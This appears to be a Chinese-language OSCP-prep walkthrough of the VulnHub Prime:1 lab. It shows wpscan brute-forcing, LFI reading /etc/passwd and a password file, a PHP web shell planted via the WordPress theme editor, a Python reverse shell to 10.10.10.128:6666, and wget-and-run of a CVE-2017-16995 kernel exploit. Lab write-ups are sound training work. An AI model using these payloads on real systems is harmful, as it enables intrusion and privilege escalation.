Prime_Series_Level-1靶场，wpscan爆破，LFI漏洞，wordpress更改文件getshell，ubuntu内核提权

泷羽Sec-尘宇安全

前言

oscp备考，oscp系列------Prime_Series_Level-1靶场，wpscan爆破，LFI漏洞，wordpress更改文件getshell，ubuntu内核提权

难度简单偏上

对于低权限shell获取涉及：wpscan爆破，LFI漏洞，wordpress更改文件getshell
对于提权：ubuntu内核提权

下载地址：

复制代码

https://www.vulnhub.com/entry/prime-1,358/

namp

主机发现

复制代码

└─# nmap -sn 10.10.10.0/24                      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:20 CST
Nmap scan report for 10.10.10.1
Host is up (0.00092s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00069s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.152
Host is up (0.00044s latency).
MAC Address: 00:0C:29:E3:08:DA (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:E3:2F:42 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap scan report for 10.10.10.151
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 3.52 seconds

端口扫描

复制代码

└─# nmap --min-rate 10000 -p- 10.10.10.152      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:21 CST
Nmap scan report for 10.10.10.152
Host is up (0.00097s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:E3:08:DA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds

└─# nmap --min-rate 10000 -p- 10.10.10.152 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:24 CST
Warning: 10.10.10.152 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.152
Host is up (0.00086s latency).
All 65535 scanned ports on 10.10.10.152 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:E3:08:DA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 73.05 seconds

详细端口扫描

复制代码

└─# nmap -sV -sT -sC -O -p22,80 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 17:13 CST
Nmap scan report for 10.10.10.152
Host is up (0.00087s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
|   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:E3:08:DA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds

信息收集

web页面，80

发现是wordpress5.2.2

目录扫描

复制代码

dirb http://10.10.10.152/ -X .txt,.php,.zip

复制代码

http://10.10.10.152/dev

没什么提示

复制代码

http://10.10.10.152/secret.txt

提到一个location.txt文件和一个链接

访问一下

复制代码

https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web

发现使用了wfuzz，应该是要进行参数爆破

漏洞利用

wpscan

复制代码

wpscan --url http://10.10.10.152/wordpress/ -e u --api-token jVg0FHFXO21oRJ3Tv9sxqYepnXAeql6qooSQfObKysQ

得到一个用户名

复制代码

victor

进行密码爆破

复制代码

wpscan --url http://10.10.10.152/wordpress/ -U victor -P /usr/share/wordlists/rockyou.txt -t 30 --api-token jVg0FHFXO21oRJ3Tv9sxqYepnXAeql6qooSQfObKysQ

爆破识别

参数爆破，LFI漏洞

之前信息收集知道要参数爆破，我们使用ffuf爆破

复制代码

ffuf -u http://10.10.10.152/index.php?FUZZ=./secret.txt -w /usr/share/dirb/wordlists/common.txt  -fs 0  >fuzz.txt

使用grep过滤一下

复制代码

cat fuzz.txt | grep -v "136"

发现file参数，访问一下

复制代码

http://10.10.10.152/index.php?file=./secret.txt

说我在挖掘错误的文件，尝试之前提到的文件

复制代码

http://10.10.10.152/index.php?file=location.txt

他说使用 'secrettier360' 参数在其他一些php页面，就只有一个image.php了

复制代码

http://10.10.10.152/image.php?secrettier360=./index.php

说我们得到了正确的参数，读取一下/etc/passwd

复制代码

http://10.10.10.152/image.php?secrettier360=../../../../../../../../etc/passwd

复制代码

find password.txt file in my directory
在我的目录中查找password.txt文件

根据这个saket用户名，路径为/home/saket/password.txt，读取一下

复制代码

http://10.10.10.152/image.php?secrettier360=../../../../../../../../home/saket/password.txt

得到

复制代码

follow_the_ippsec

之前得到的用户名：victor，尝试登录试试

wordpress更改网页文件，getshell

登录成功，上传反弹shell脚本

发现不行

在网上搜索一下wordpress 5.2.2漏洞，来到编辑文件的地方，找到一个可写文件，写入木马

复制代码

<?php
system($_GET["cmd"]);
?>

这里文件的访问路径规律为

首先确定在/wordpress/wp-content/themes/目录下面
然后分类为Twenty Nineteen，则下一层目录为/twentynineteen
最终路径为

http://10.10.10.152/wordpress/wp-content/themes/twentynineteen/secret.php?cmd=ls

访问一下

反弹shell

复制代码

http://10.10.10.152/wordpress/wp-content/themes/twentynineteen/secret.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.10.128%22,6666));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

提权

读取一下配置文件，获取mysql账号密码

复制代码

/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'yourpasswordhere' );

进入数据看看没有发现什么信息

sudo -l查看一下权限，发现有一个不需要密码的可以运行文件/home/saket/enc

不过尝试了一些，发现不行

ubuntu内核提权，cve-2017-16995

查看一下内核

复制代码

www-data@ubuntu:/home/saket$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/home/saket$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
www-data@ubuntu:/home/saket$

查看一下是否存在漏洞，发现有一个比较符合

利用一下

复制代码

wget http://10.10.10.128/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995

成功获取root权限